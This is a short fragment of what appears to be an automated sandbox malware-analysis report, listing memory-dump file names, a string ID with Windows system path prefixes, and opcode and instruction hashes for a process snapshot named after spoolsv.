                                                                                                        • Associated: 00000003.00000002.2167521355.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2169309024.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2172515144.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000421000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2173799676.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: %systemroot%$\??\$\SystemRoot\$\\?\
                                                                                                        • API String ID: 0-1311169778
                                                                                                        • Opcode ID: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                        • Instruction ID: 3cf452ae6fb0dfcbcd02110e459b44aaa686f69a821e3f1c8313cc58adc2f9c6
                                                                                                        • Opcode Fuzzy Hash: 8b5b65525cf323457cd06075d39e7c1bde9f6f91a6c07b5f569d8b5f78ef97a4
                                                                                                        • Instruction Fuzzy Hash: 8F214B70A54209BBCB04EB54CC82FEFBB79AB54710F204327B611B72D4DEB45945CAD4